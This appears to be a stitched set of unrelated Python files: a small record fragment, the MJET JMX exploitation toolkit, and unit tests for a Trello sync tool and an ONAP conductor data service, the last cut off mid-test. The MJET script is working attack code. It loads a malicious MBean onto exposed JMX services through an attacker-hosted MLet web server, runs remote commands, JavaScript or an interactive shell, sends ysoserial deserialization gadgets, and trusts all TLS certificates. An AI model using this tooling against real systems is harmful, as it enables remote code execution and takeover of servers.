        """Record from Python primitive: entry fields are split off into a
        new Entry, the remaining keys become a new Item."""
        self.entry = Entry()
        self.entry.primitive = primitive
        primitive = copy(primitive)
        # Remove the entry's own fields so the Item holds only item data.
        for field in self.entry.fields:
            del primitive[field]
        self.item = Item()
        self.item.primitive = primitive
| StarcoderdataPython |
1679542 | # jmx stuff
from javax.management.remote import JMXServiceURL
from javax.management.remote import JMXConnector
from javax.management.remote import JMXConnectorFactory
from javax.management import ObjectName
from java.lang import String
from java.lang import Object
from jarray import array
from java.io import IOException
from javax.net.ssl import TrustManager, X509TrustManager
from javax.net.ssl import SSLContext
# BaseHTTPServer needed to serve mlets
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
from threading import Thread
import sys
import os
import time
import jarray
from jarray import array
# Extra
import argparse
import base64
import random
import string
authorSignature = 'MJET - MOGWAI LABS JMX Exploitation Toolkit\n'
authorSignature += '==========================================='
class TrustAllX509TrustManager(X509TrustManager):
def checkClientTrusted(self, chain, auth):
pass
def checkServerTrusted(self,chain,auth):
pass
def getAcceptedIssuers(self):
return None
### AUX ###
def connectToJMX(args):
# Basic JMX connection, always required
trust_managers = array([TrustAllX509TrustManager()], TrustManager)
sc = SSLContext.getInstance("SSL")
sc.init(None, trust_managers, None)
SSLContext.setDefault(sc)
jmx_url = JMXServiceURL("service:jmx:rmi:///jndi/rmi://" + args.targetHost + ":" + args.targetPort + "/jmxrmi")
print "[+] Connecting to: " + str(jmx_url)
try:
# for passing credentials for password
if args.jmxpassword and args.jmxrole:
print ("[+] Using credentials: " + str(args.jmxrole) + " / " + str(args.jmxpassword))
credentials = array([args.jmxrole,args.jmxpassword],String)
environment = {JMXConnector.CREDENTIALS:credentials}
jmx_connector = JMXConnectorFactory.connect(jmx_url, environment)
else:
jmx_connector = JMXConnectorFactory.connect(jmx_url)
print "[+] Connected: " + str(jmx_connector.getConnectionId())
bean_server = jmx_connector.getMBeanServerConnection()
return bean_server
except:
print "[-] Error: Can't connect to remote service"
if "Authentication failed! Invalid username or password" in str(sys.exc_info()[1]):
print "[-] Authentication failed! Invalid username or password"
sys.exit(-1)
##########
### WEBSERVER MODE ###
def webserverMode(args):
startWebserver(args)
raw_input("[+] Press Enter to stop the service\n")
### /WEBSERVER MODE ###
### INSTALL MODE ###
def installMode(args):
startWebserver(args)
bean_server = connectToJMX(args)
installMBean(args, bean_server)
print "[+] Done"
def installMBean(args, bean_server):
# Installation, load javax.management.loading.MLet to install additional MBeans
# If loading fails, the Mlet is already loaded...
try:
mlet_bean = bean_server.createMBean("javax.management.loading.MLet", None)
except:
# MLet Bean can't be created because it already exists
mlet_bean = bean_server.getObjectInstance(ObjectName("DefaultDomain:type=MLet"))
print "[+] Loaded " + str(mlet_bean.getClassName())
# Install payload Mlet via getMbeansFromURL
# pass the URL of the web server
print "[+] Loading malicious MBean from " + args.payload_url
print "[+] Invoking: "+ mlet_bean.getClassName() + ".getMBeansFromURL"
inv_array1 = jarray.zeros(1, Object)
inv_array1[0] = args.payload_url
inv_array2 = jarray.zeros(1, String)
inv_array2[0] = String.canonicalName
resource = bean_server.invoke(mlet_bean.getObjectName(), "getMBeansFromURL", inv_array1, inv_array2)
# Check if the Mlet was loaded successfully
for res in resource:
if res.__class__.__name__ == "InstanceAlreadyExistsException":
print "[+] Object instance already existed, no need to install it a second time"
elif res.__class__.__name__ == "ObjectInstance":
print "[+] Successfully loaded MBean" + str(res.getObjectName())
# Change the password from "<PASSWORD>" to the new value
print "[+] Changing default password..."
changePassword("<PASSWORD>", args.password, bean_server)
else:
print res
def startWebserver(args):
# Start a web server on all ports in a seperate thread
# Only needed during installation
print "[+] Starting webserver at port " + str(args.payload_port)
mletHandler = MakeHandlerClass(args.payload_url)
mlet_webserver = HTTPServer(('', int(args.payload_port)), mletHandler)
webserver_thread = Thread(target = mlet_webserver.serve_forever)
webserver_thread.daemon = True
try:
webserver_thread.start()
except KeyboardInterrupt:
mlet_webserver.shutdown()
sys.exit(0)
def MakeHandlerClass(base_url):
    """Build a BaseHTTPRequestHandler subclass bound to *base_url*.

    The returned class handles the requests the JMX service makes while the
    JAR is being installed: "/" answers with the MLet HTML descriptor and
    any "*.jar" path answers with the payload JAR from ./payloads/.
    """
    class CustomHandler(BaseHTTPRequestHandler):
        def __init__(self, *args, **kwargs):
            self._base_url = base_url
            # Random 8-letter JAR name; it is advertised in the MLet
            # descriptor below, and any path ending in '.jar' is served
            self.jar_name = ''.join(random.choice(string.ascii_lowercase) for _ in range(8)) + '.jar'
            BaseHTTPRequestHandler.__init__(self, *args, **kwargs)

        # Handler for incoming GET requests
        def do_GET(self):
            if self.path=="/":
                # MLet descriptor pointing the JMX MLet service at the JAR
                mlet_code = '<html><mlet code="de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload" archive="' + self.jar_name + '" name="MogwaiLabs:name=payload,id=1" codebase="' + self._base_url + '"></mlet></html>'
                self.send_response(200)
                self.send_header('Pragma', 'no-cache')
                self.end_headers()
                self.wfile.write(mlet_code)
            elif self.path.endswith('.jar'):
                f = open("./payloads/MogwaiLabsMJET-MLet.jar")
                self.send_response(200)
                self.send_header('Content-type', 'application/jar')
                self.end_headers()
                self.wfile.write(f.read())
                f.close()
            else:
                self.send_error(404, 'File not found: ' + self.path)
            #
            # except IOError:
            #     self.send_error(404,'File Not Found: %s' % self.path)
    return CustomHandler
### /INSTALL MODE ###
### UNINSTALL MODE ###
def uninstallMode(args):
    """Connect to the target JMX service and remove the payload MBean."""
    bean_server = connectToJMX(args)
    uninstallMBeans(bean_server)
    print "[+] Done"
def uninstallMBeans(bean_server):
    """Unregister the payload MBean; exit if it is not installed."""
    try:
        bean_server.unregisterMBean(ObjectName("MogwaiLabs:name=payload,id=1"))
    except:
        # Broad except: Jython surfaces Java exceptions here; any failure is
        # treated as "MBean not registered"
        print "[-] Error: The MBean is not registered in the target server"
        sys.exit(0)
    print "[+] MBean correctly uninstalled"
### /UNINSTALL MODE ###
### CHANGE PASSWORD MODE ###
def changePasswordMode(args):
    """Connect to the target and change the payload MBean's access password."""
    bean_server = connectToJMX(args)
    changePassword(args.password, args.newpass, bean_server)
    print "[+] Done"
def changePassword(password, newpass, bean_server):
    """Invoke changePassword(old, new) on the installed payload MBean.

    The MBean method takes two String arguments; the invocation passes the
    values in inv_array1 and the Java type signature in inv_array2.
    """
    # Load the payload MLet and invoke a method on it
    mlet_bean = bean_server.getObjectInstance(ObjectName("MogwaiLabs:name=payload,id=1"))
    print "[+] Loaded " + str(mlet_bean.getClassName())
    inv_array1 = jarray.zeros(2, Object)
    inv_array1[0] = password
    # NOTE(review): "<PASSWORD>pass" is not valid Python -- this looks like a
    # redaction artifact; the original presumably assigned `newpass`. Confirm
    # against the upstream source before running.
    inv_array1[1] = <PASSWORD>pass
    inv_array2 = jarray.zeros(2, String)
    inv_array2[0] = String.canonicalName
    inv_array2[1] = String.canonicalName
    resource = bean_server.invoke(mlet_bean.getObjectName(), "changePassword", inv_array1, inv_array2)
    # The MBean returns a boolean-ish result; compare its string form
    if str(resource) == "True":
        print "[+] Successfully changed password"
    else:
        print "[-] Unable to change password"
    sys.stdout.flush()
### /CHANGE PASSWORD MODE ###
### COMMAND MODE ###
def commandMode(args):
    """Connect to the target and run a single command via the payload MBean."""
    bean_server = connectToJMX(args)
    executeCommand(args.password, args.cmd, bean_server)
    print "[+] Done"
def executeCommand(password, cmd, bean_server):
    """Invoke the payload MBean's runCMD(password, cmd) and print its output."""
    # Load the payload MLet and invoke a method on it
    mlet_bean = bean_server.getObjectInstance(ObjectName("MogwaiLabs:name=payload,id=1"))
    print "[+] Loaded " + str(mlet_bean.getClassName())
    print "[+] Executing command: " + cmd
    # Two-argument invocation: values in inv_array1, (String, String)
    # type signature in inv_array2
    inv_array1 = jarray.zeros(2, Object)
    inv_array1[0] = password
    inv_array1[1] = cmd
    inv_array2 = jarray.zeros(2, String)
    inv_array2[0] = String.canonicalName
    inv_array2[1] = String.canonicalName
    resource = bean_server.invoke(mlet_bean.getObjectName(), "runCMD", inv_array1, inv_array2)
    print resource
    sys.stdout.write("\n")
    sys.stdout.flush()
### /COMMAND MODE ###
### JAVASCRIPT MODE ###
def scriptMode(args):
    """Read a JavaScript file from disk and execute it on the target."""
    bean_server = connectToJMX(args)
    with open(args.filename, 'r') as myfile:
        script=myfile.read()
    executeJS(args.password, script, bean_server)
    print "[+] Done"
def executeJS(password, js, bean_server):
    """Invoke the payload MBean's runJS(password, script) and print any result."""
    # Load the payload MLet and invoke a method on it
    mlet_bean = bean_server.getObjectInstance(ObjectName("MogwaiLabs:name=payload,id=1"))
    print "[+] Loaded " + str(mlet_bean.getClassName())
    print "[+] Executing script"
    # Two-argument invocation: values in inv_array1, (String, String)
    # type signature in inv_array2
    inv_array1 = jarray.zeros(2, Object)
    inv_array1[0] = password
    inv_array1[1] = js
    inv_array2 = jarray.zeros(2, String)
    inv_array2[0] = String.canonicalName
    inv_array2[1] = String.canonicalName
    resource = bean_server.invoke(mlet_bean.getObjectName(), "runJS", inv_array1, inv_array2)
    # runJS may legitimately return nothing
    if resource is not None:
        print resource
    sys.stdout.write("\n")
    sys.stdout.flush()
### /JAVASCRIPT MODE ###
### SHELL MODE ###
def shellMode(args):
    """Connect to the target and enter the interactive command loop."""
    bean_server = connectToJMX(args)
    startShell(args.password, bean_server)
    print "[+] Done"
def startShell(password, bean_server):
    """Interactive pseudo-shell: forward each input line to executeCommand.

    Typing 'exit_shell' leaves the loop; every other line is sent to the
    target as a command.
    """
    print "[+] Use command 'exit_shell' to exit the shell"
    in_command_loop = True
    while in_command_loop:
        cmd = raw_input(">>> ")
        if cmd == 'exit_shell':
            in_command_loop = False
        else:
            executeCommand(password, cmd, bean_server)
### /SHELL MODE ###
### DESERIALIZATION MODE ###
def deserializationMode(args):
    """Deliver a ysoserial gadget object through Logging.getLoggerLevel.

    Requires ysoserial.jar in the working directory; it is appended to
    sys.path so its classes are importable from Jython.
    """
    if not os.path.isfile('./ysoserial.jar'):
        print "[-] Error: Did not find ysoserial.jar in this folder. Please download it from https://github.com/frohoff/ysoserial"
        sys.exit(1)
    sys.path.append("./ysoserial.jar")
    print "[+] Added ysoserial API capacities"
    from ysoserial.payloads.ObjectPayload import Utils
    # Connect to the JMX server
    bean_server = connectToJMX(args)
    # Generate the serialized gadget object with ysoserial
    payload_object = Utils.makePayloadObject(args.gadget, args.cmd)
    # Use the always-registered java.util.logging MBean as the invocation
    # target; the gadget is passed where a String loglevel is expected
    mlet_bean = bean_server.getObjectInstance(ObjectName("java.util.logging:type=Logging"))
    print "[+] Loaded " + str(mlet_bean.getClassName())
    print "[+] Passing ysoserial object as parameter to getLoggerLevel(String loglevel)"
    inv_array1 = jarray.zeros(1, Object)
    inv_array1[0] = payload_object
    inv_array2 = jarray.zeros(1, String)
    inv_array2[0] = String.canonicalName
    try:
        resource = bean_server.invoke(mlet_bean.getObjectName(), "getLoggerLevel", inv_array1, inv_array2)
    except:
        # The invocation is expected to raise; classify the exception text
        if "argument type mismatch" in str(sys.exc_info()[1]):
            print "[+] Got an argument type mismatch exception - this is expected"
        elif "Access denied! Invalid access level" in str(sys.exc_info()[1]):
            print "[+] Got an access denied exception - this is expected"
        else:
            print "[-] Got a " + str(sys.exc_info()[1]) + "exception, exploitation failed"
    sys.stdout.write("\n")
    sys.stdout.flush()
    print "[+] Done"
### /DESERIALIZATION MODE ###
### PARSER ###
# Map for clarity's sake
# Thin argparse dispatch wrappers: each subcommand's set_defaults(func=...)
# points at one of these, which simply forwards to the mode implementation.
def arg_install_mode(args):
    installMode(args)

def arg_command_mode(args):
    commandMode(args)

def arg_script_mode(args):
    scriptMode(args)

def arg_shell_mode(args):
    shellMode(args)

def arg_password_mode(args):
    changePasswordMode(args)

def arg_uninstall_mode(args):
    uninstallMode(args)

def arg_webserver_mode(args):
    # NOTE(review): webserverMode is defined elsewhere in this file --
    # not visible in this chunk
    webserverMode(args)

def arg_deserialization_mode(args):
    deserializationMode(args)
# print header
print ""
print authorSignature

# Base parser: global target/credential options shared by every mode
parser = argparse.ArgumentParser(description = 'MJET allows an easy exploitation of insecure JMX services', epilog='--- MJET - MOGWAI LABS JMX Exploitation Toolkit ------------------', add_help=True)
parser.add_argument('targetHost', help='target IP address')
parser.add_argument('targetPort', help='target JMX service port')
parser.add_argument('--jmxrole', help='remote JMX role')
parser.add_argument('--jmxpassword', help='remote JMX password')
# One subparser per mode; each binds its handler via set_defaults(func=...)
subparsers = parser.add_subparsers(title='modes', description='valid modes', help='use ... MODE -h for help about specific modes')

# Install mode
install_subparser = subparsers.add_parser('install', help='install the payload MBean on the target')
install_subparser.add_argument('password', help="the password that should be set after successful installation")
install_subparser.add_argument('payload_url', help='URL to load the payload (full URL)')
install_subparser.add_argument('payload_port', help='port to load the payload')
install_subparser.set_defaults(func=arg_install_mode)

# Uninstall mode
uninstall_subparser = subparsers.add_parser('uninstall', help='uninstall the payload MBean from the target')
uninstall_subparser.set_defaults(func=arg_uninstall_mode)

# Password mode
password_subparser = subparsers.add_parser('changepw', help='change the payload password on the target')
password_subparser.add_argument('password', help="the password to access the installed MBean")
password_subparser.add_argument('newpass', help='The new password')
password_subparser.set_defaults(func=arg_password_mode)

# Command mode
command_subparser = subparsers.add_parser('command', help='execute a command in the target')
command_subparser.add_argument('password', help="the password to access the installed MBean")
command_subparser.add_argument('cmd', help='command to be executed')
command_subparser.set_defaults(func=arg_command_mode)

# Javascript mode
script_subparser = subparsers.add_parser('javascript', help='execute JavaScript code from a file in the target')
script_subparser.add_argument('password', help="the password to access the installed MBean")
script_subparser.add_argument('filename', help='file with the JavaScript code to be executed')
script_subparser.set_defaults(func=arg_script_mode)

# Shell mode
shell_subparser = subparsers.add_parser('shell', help='open a simple command shell in the target')
shell_subparser.add_argument('password', help="the required password to access the installed MBean")
shell_subparser.set_defaults(func=arg_shell_mode)

# Webserver mode
webserver_subparser = subparsers.add_parser('webserver', help='just run the MLET web server')
webserver_subparser.add_argument('payload_url', help='URL to load the payload (full URL)')
webserver_subparser.add_argument('payload_port', help='port to load the system')
webserver_subparser.set_defaults(func=arg_webserver_mode)

# Deserialization mode
deserialize_subparser = subparsers.add_parser('deserialize', help='send a ysoserial payload to the target')
deserialize_subparser.add_argument('gadget', help='gadget as provided by ysoserial, e.g., CommonsCollections6')
deserialize_subparser.add_argument('cmd', help='command to be executed')
deserialize_subparser.set_defaults(func=arg_deserialization_mode)

# Parse the user args and dispatch to the selected mode handler
args = parser.parse_args()
args.func(args)
| StarcoderdataPython |
1702555 | <filename>tests/test_sync_tool.py
import unittest
from nextactions.synctool import SyncTool
from nextactions.trello import Trello
from nextactions.board import Board
from nextactions.list import List
from nextactions.config import Config
from unittest.mock import MagicMock, call, patch
from nextactions.card import Card
class TestSyncTool(unittest.TestCase):
    """Unit tests for SyncTool with the Trello backend fully mocked out."""

    def setUp(self):
        # Wire a fake GTD board ("123") holding a "Next Actions" list ("456");
        # lookups on the Trello client are replaced with MagicMocks
        self.config = Config()
        self.config.set('gtd_board_id', "123")
        self.trello = Trello(self.config)
        self.board = Board(self.trello, {'id': "123", 'name': "GTD"})
        self.list = List(self.trello, {'id': "456", 'name': "Next Actions"})
        self.trello.getBoardById = MagicMock(return_value=self.board)
        self.board.getListByName = MagicMock(return_value=self.list)
        self.sync_tool = SyncTool(self.config, self.trello)

    def testGetNextActionCards(self):
        # Empty board -> empty result, and the configured board id is used
        self.board.getCards = MagicMock(return_value=[])
        self.assertEqual(self.sync_tool.getNextActionCards(), [])
        self.trello.getBoardById.assert_called_once_with("123")
        self.board.getCards.assert_called_once()

    @patch('nextactions.card.Card')
    @patch('nextactions.card.Card')
    def testGetNextActionCardsReturnsOnlyAutoGeneratedCards(self, normal,
                                                            auto):
        # Only auto-generated cards count as next actions
        normal.isAutoGenerated.return_value = False
        auto.isAutoGenerated.return_value = True
        self.board.getCards = MagicMock(return_value=[auto, normal])
        results = self.sync_tool.getNextActionCards()
        self.assertEqual(results, [auto])

    @patch('nextactions.card.Card')
    def testReset(self, card):
        # reset() archives every next-action card and returns them
        self.sync_tool.getNextActionCards = MagicMock(return_value=[card])
        archived = self.sync_tool.reset()
        card.archive.assert_called_once()
        self.assertEqual(archived, [card])

    @patch('nextactions.board.Board')
    @patch('nextactions.list.List')
    @patch('nextactions.card.Card')
    def testGetProjectBoards(self, card, project_list, project_board):
        # Each card in the projects list maps to its project board
        self.board.getListByName = MagicMock(return_value=project_list)
        card.getProjectBoard.return_value = project_board
        project_list.getCards.return_value = [card]
        self.assertEqual(self.sync_tool.getProjectBoards(), [project_board])

    def testGetTopTodoCardsForNonExistentList(self):
        # A project board without the expected list contributes nothing
        self.board.getListByName = MagicMock(return_value=None)
        self.sync_tool.getProjectBoards = MagicMock(return_value=[self.board])
        self.assertEqual(self.sync_tool.getTopTodoCards(), [])

    @patch('nextactions.list.List')
    def testGetTopTodoCardsForEmptyList(self, project_list):
        # An empty todo list contributes nothing
        self.board.getListByName = MagicMock(return_value=project_list)
        project_list.getTopCard.return_value = None
        self.sync_tool.getProjectBoards = MagicMock(return_value=[self.board])
        self.assertEqual(self.sync_tool.getTopTodoCards(), [])

    @patch('nextactions.card.Card', autospec=True)
    def testGetTopTodoCards(self, card):
        # One top card is collected per project board
        boards = [self.board, self.board]
        self.sync_tool.getProjectBoards = MagicMock(return_value=boards)
        self.list.getCards = MagicMock(return_value=[card])
        self.assertEqual(self.sync_tool.getTopTodoCards(), [card, card])

    @patch('nextactions.card.Card', autospec=True)
    def testSyncCard(self, card):
        # The created card's title is "<board name> - <card name>" and its
        # description carries the source URL plus the auto-generated marker
        card.board_id = "123"
        card.name = "Card"
        card.url = "URL"
        self.list.createCard = MagicMock()
        self.sync_tool.syncCard(card)
        self.list.createCard.assert_called_once_with(
            "GTD - Card",
            "URL\n\n" + Card.AUTO_GENERATED_TEXT
        )

    @patch('nextactions.card.Card', autospec=True)
    def testSyncArchivesOldNextActions(self, card):
        # A next action with no matching todo card gets archived
        self.sync_tool.getNextActionCards = MagicMock(return_value=[card])
        self.trello.getOwnedCards = MagicMock(return_value=[])
        self.sync_tool.getTopTodoCards = MagicMock(return_value=[])
        card.archive = MagicMock()
        created, archived = self.sync_tool.sync()
        card.archive.assert_called_once()
        self.assertEqual(created, [])
        self.assertEqual(archived, [card])

    @patch('nextactions.card.Card')
    @patch('nextactions.card.Card')
    def testSyncIgnoresExistingNextActions(self, card, next_action_card):
        # A next action already linked to a todo card is neither archived
        # nor re-created
        next_action_card.linksTo.return_value = True
        self.sync_tool.getNextActionCards = MagicMock(
            return_value=[next_action_card]
        )
        self.trello.getOwnedCards = MagicMock(return_value=[])
        self.sync_tool.getTopTodoCards = MagicMock(return_value=[card])
        next_action_card.archive = MagicMock()
        self.sync_tool.syncCard = MagicMock()
        created, archived = self.sync_tool.sync()
        next_action_card.archive.assert_not_called()
        self.sync_tool.syncCard.assert_not_called()
        self.assertEqual(created, [])
        self.assertEqual(archived, [])

    @patch('nextactions.card.Card')
    @patch('nextactions.card.Card')
    def testSyncCreatesNextActionCards(self, card1, card2):
        # Owned cards and top todo cards both get synced, in that order
        self.sync_tool.getNextActionCards = MagicMock(return_value=[])
        self.trello.getOwnedCards = MagicMock(return_value=[card1])
        self.sync_tool.getTopTodoCards = MagicMock(return_value=[card2])
        self.sync_tool.syncCard = MagicMock()
        created, archived = self.sync_tool.sync()
        self.sync_tool.syncCard.assert_has_calls([call(card1), call(card2)])
        self.assertEqual(created, [card1, card2])
        self.assertEqual(archived, [])
| StarcoderdataPython |
1625462 | #
# -------------------------------------------------------------------------
# Copyright (c) 2018 Intel Corporation Intellectual Property
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -------------------------------------------------------------------------
#
import copy
import json
import unittest
import uuid
import conductor.data.service as service
import mock
import stevedore
import yaml
from conductor.common.utils import conductor_logging_util as log_util
from conductor.data.plugins.inventory_provider import extensions as ip_ext
from conductor.data.plugins.service_controller import extensions as sc_ext
from conductor.data.plugins.vim_controller import extensions as vc_ext
from conductor.data.service import DataEndpoint
from oslo_config import cfg
class TestDataEndpoint(unittest.TestCase):
    """Unit tests for conductor.data.service.DataEndpoint.

    Real stevedore extension managers are constructed, but the plugin
    calls themselves are patched per test; inputs come from JSON/YAML
    fixture files under ./conductor/tests/unit/data/.
    """

    def setUp(self):
        ip_ext_manager = (
            ip_ext.Manager(cfg.CONF, 'conductor.inventory_provider.plugin'))
        vc_ext_manager = (
            vc_ext.Manager(cfg.CONF, 'conductor.vim_controller.plugin'))
        sc_ext_manager = (
            sc_ext.Manager(cfg.CONF, 'conductor.service_controller.plugin'))
        self.data_ep = DataEndpoint(ip_ext_manager,
                                    vc_ext_manager,
                                    sc_ext_manager)

    def tearDown(self):
        pass

    def test_get_candidate_location(self):
        # Latitude/longitude extraction plus the missing-coordinates error path
        req_json_file = './conductor/tests/unit/data/candidate_list.json'
        req_json_candidate = json.loads(open(req_json_file).read())
        req_json = dict()
        req_json['candidate'] = req_json_candidate['candidate_list'][0]
        location = (32.897480, -97.040443)
        self.assertEqual({'response': location, 'error': False},
                         self.data_ep.get_candidate_location(None, req_json))
        # Missing coordinates must be reported as an error
        req_json['candidate']['latitude'] = None
        req_json['candidate']['longitude'] = None
        self.assertEqual({'response': None, 'error': True},
                         self.data_ep.get_candidate_location(None,
                                                             req_json))
        req_json['candidate'] = req_json_candidate['candidate_list'][1]
        location = (40.7128, -74.0060)
        self.assertEqual({'response': location, 'error': False},
                         self.data_ep.get_candidate_location(None, req_json))

    def test_get_candidate_zone(self):
        # Zone lookup by category; a missing category is an error
        req_json_file = './conductor/tests/unit/data/candidate_list.json'
        req_json_candidate = json.loads(open(req_json_file).read())
        req_json = dict()
        req_json['candidate'] = req_json_candidate['candidate_list'][0]
        req_json['category'] = None
        self.assertEqual({'response': None, 'error': True},
                         self.data_ep.get_candidate_zone(None, req_json))
        req_json['category'] = 'region'
        self.assertEqual({'response': 'DLLSTX55', 'error': False},
                         self.data_ep.get_candidate_zone(None, req_json))
        req_json['category'] = 'complex'
        self.assertEqual({'response': 'dalls_one', 'error': False},
                         self.data_ep.get_candidate_zone(None, req_json))
        req_json['candidate'] = req_json_candidate['candidate_list'][1]
        req_json['category'] = 'region'
        self.assertEqual({'response': 'NYCNY55', 'error': False},
                         self.data_ep.get_candidate_zone(None, req_json))

    @mock.patch.object(service.LOG, 'error')
    @mock.patch.object(service.LOG, 'debug')
    @mock.patch.object(stevedore.ExtensionManager, 'map_method')
    def test_get_candidates_from_service(self, ext_mock, debug_mock,
                                         error_mock):
        # Plugin returns the fixture candidates; an unknown controller
        # yields an empty (non-error) response
        req_json_file = './conductor/tests/unit/data/constraints.json'
        req_json = yaml.safe_load(open(req_json_file).read())
        candidate_list = req_json['candidate_list']
        ext_mock.return_value = [candidate_list]
        self.maxDiff = None
        self.assertEqual(2, len(
            self.data_ep.get_candidates_from_service(None, req_json)))
        req_json['controller'] = 'APP-C'
        self.assertEqual({'response': [], 'error': False},
                         self.data_ep.get_candidates_from_service(None,
                                                                  req_json))

    def test_get_candidate_discard_set(self):
        # Complex-name filter discards 3 candidates; region filter discards 0
        req_json_file = './conductor/tests/unit/data/constraints.json'
        req_json = yaml.safe_load(open(req_json_file).read())
        value_attrib = 'complex_name'
        value = req_json['properties']['evaluate'][value_attrib]
        candidate_list = req_json['candidate_list']
        self.assertEqual(3, len(self.data_ep.get_candidate_discard_set(value,
                                                                       candidate_list,
                                                                       value_attrib)))
        value_attrib = 'region'
        value = req_json['properties']['evaluate'][value_attrib]
        self.assertEqual(0, len(self.data_ep.get_candidate_discard_set(value,
                                                                       candidate_list,
                                                                       value_attrib)))

    def test_get_candidate_discard_set_by_cloud_region(self):
        # Cloud-region filter discards 2 of the fixture candidates
        req_json_file = './conductor/tests/unit/data/constraints.json'
        req_json = yaml.safe_load(open(req_json_file).read())
        value_attrib = 'location_id'
        value = req_json['properties']['evaluate']['cloud-region']
        candidate_list = req_json['candidate_list']
        self.assertEqual(2, len(
            self.data_ep.get_candidate_discard_set_by_cloud_region(value,
                                                                   candidate_list,
                                                                   value_attrib)))

    @mock.patch.object(service.LOG, 'error')
    @mock.patch.object(service.LOG, 'debug')
    @mock.patch.object(service.LOG, 'info')
    @mock.patch.object(stevedore.ExtensionManager, 'map_method')
    @mock.patch.object(stevedore.ExtensionManager, 'names')
    def test_get_inventory_group_candidates(self, ext2_mock, ext1_mock,
                                            info_mock, debug_mock, error_mock):
        # None / [None] plugin results are errors; a valid pair keeps only
        # the candidate named in it
        ext1_mock.return_value = None
        req_json_file = './conductor/tests/unit/data/constraints.json'
        req_json = yaml.safe_load(open(req_json_file).read())
        self.assertEqual({'response': [], 'error': True},
                         self.data_ep.get_inventory_group_candidates(None,
                                                                     arg=req_json))
        ext1_mock.return_value = [None]
        self.assertEqual({'response': [], 'error': True},
                         self.data_ep.get_inventory_group_candidates(None,
                                                                     arg=req_json))
        pairs = [['instance-1', 'instance-2']]
        ext1_mock.return_value = [pairs]
        ext2_mock.return_value = ['aai']
        candidate_list = req_json['candidate_list']
        expected_candidate_list = [c for c in candidate_list
                                   if c["candidate_id"] == 'instance-1']
        self.assertEqual({'response': expected_candidate_list, 'error': False},
                         self.data_ep.get_inventory_group_candidates(None,
                                                                     arg=req_json))

    @mock.patch.object(service.LOG, 'error')
    @mock.patch.object(service.LOG, 'debug')
    @mock.patch.object(service.LOG, 'info')
    @mock.patch.object(stevedore.ExtensionManager, 'map_method')
    @mock.patch.object(stevedore.ExtensionManager, 'names')
    def test_get_candidates_by_attributes(self, ext_mock2, ext_mock1,
                                          info_mock, debug_mock, error_mock):
        # Attribute filtering driven by the ip_ext_sideeffect fake provider
        req_json_file = './conductor/tests/unit/data/constraints.json'
        req_json = yaml.safe_load(open(req_json_file).read())
        candidate_list = req_json['candidate_list']
        ext_mock1.side_effect = ip_ext_sideeffect
        ext_mock2.return_value = ['aai']
        self.maxDiff = None
        expected_response = {'response': [candidate_list[0]], 'error': False}
        self.assertEqual(expected_response,
                         self.data_ep.get_candidates_by_attributes(None,
                                                                   req_json))
        req_json['properties']['evaluate']['network_roles'] = {"all": []}
        expected_response = {'response': [candidate_list[0]], 'error': False}
        self.assertEqual(expected_response,
                         self.data_ep.get_candidates_by_attributes(None,
                                                                   req_json))
        req_json['properties']['evaluate']['network_roles'] = {"any": []}
        expected_response = {'response': [candidate_list[0]], 'error': False}
        self.assertEqual(expected_response,
                         self.data_ep.get_candidates_by_attributes(None,
                                                                   req_json))
        # 'role-1' makes the fake provider return None -> candidate discarded
        req_json['properties']['evaluate']['network_roles'] = {
            "all": ['role-1']}
        expected_response = {'response': [], 'error': False}
        self.assertEqual(expected_response,
                         self.data_ep.get_candidates_by_attributes(None,
                                                                   req_json))
        req_json['properties']['evaluate']['network_roles'] = {
            "all": ['role-2']}
        expected_response = {'response': [], 'error': False}
        self.assertEqual(expected_response,
                         self.data_ep.get_candidates_by_attributes(None,
                                                                   req_json))

    @mock.patch.object(service.LOG, 'error')
    @mock.patch.object(service.LOG, 'debug')
    @mock.patch.object(service.LOG, 'info')
    @mock.patch.object(log_util, 'getTransactionId')
    @mock.patch.object(stevedore.ExtensionManager, 'map_method')
    def test_resolve_demands(self, ext_mock, logutil_mock, info_mock,
                             debug_mock,
                             error_mock):
        # Empty plugin result is an error; a resolved demand is passed through
        self.maxDiff = None
        req_json_file = './conductor/tests/unit/data/demands.json'
        req_json = yaml.safe_load(open(req_json_file).read())
        ctxt = {
            'plan_id': uuid.uuid4(),
            'keyspace': cfg.CONF.keyspace
        }
        logutil_mock.return_value = uuid.uuid4()
        ext_mock.return_value = []
        expected_response = {'response': {'resolved_demands': None, 'trans': {'plan_id': None,
                                                                              'plan_name': None,
                                                                              'translator_triage': []}},
                             'error': True}
        self.assertEqual(expected_response,
                         self.data_ep.resolve_demands(ctxt, req_json))
        return_value = req_json['demands']['vG']
        ext_mock.return_value = [return_value]
        expected_response = { 'error': False, 'response':
            { 'resolved_demands':
                  [{ 'attributes':
                         { 'customer-id': 'some_company', 'provisioning-status': 'provisioned' },
                     'inventory_provider': 'aai', 'inventory_type': 'service', 'service_type': 'vG' },
                   { 'inventory_provider': 'aai', 'inventory_type': 'cloud' } ],
              'trans': { 'plan_id': 'plan_abc', 'plan_name': 'plan_name', 'translator_triage': [ [] ] } } }
        self.assertEqual(expected_response,
                         self.data_ep.resolve_demands(ctxt, req_json))

    @mock.patch.object(service.LOG, 'error')
    @mock.patch.object(service.LOG, 'debug')
    @mock.patch.object(service.LOG, 'info')
    @mock.patch.object(log_util, 'getTransactionId')
    @mock.patch.object(stevedore.ExtensionManager, 'map_method')
    def test_resolve_vfmodule_demands(self, ext_mock, logutil_mock, info_mock,
                                      debug_mock,
                                      error_mock):
        # vfmodule demands resolve with their full attribute payload intact
        self.maxDiff = None
        req_json_file = './conductor/tests/unit/data/demands_vfmodule.json'
        req_json = yaml.safe_load(open(req_json_file).read())
        ctxt = {
            'plan_id': uuid.uuid4(),
            'keyspace': cfg.CONF.keyspace
        }
        logutil_mock.return_value = uuid.uuid4()
        return_value = req_json['demands']['vFW-SINK']
        ext_mock.return_value = [return_value]
        expected_response = \
            {'response': {'trans': {'translator_triage': [ [] ], 'plan_name': 'plan_name', 'plan_id': 'plan_abc'},
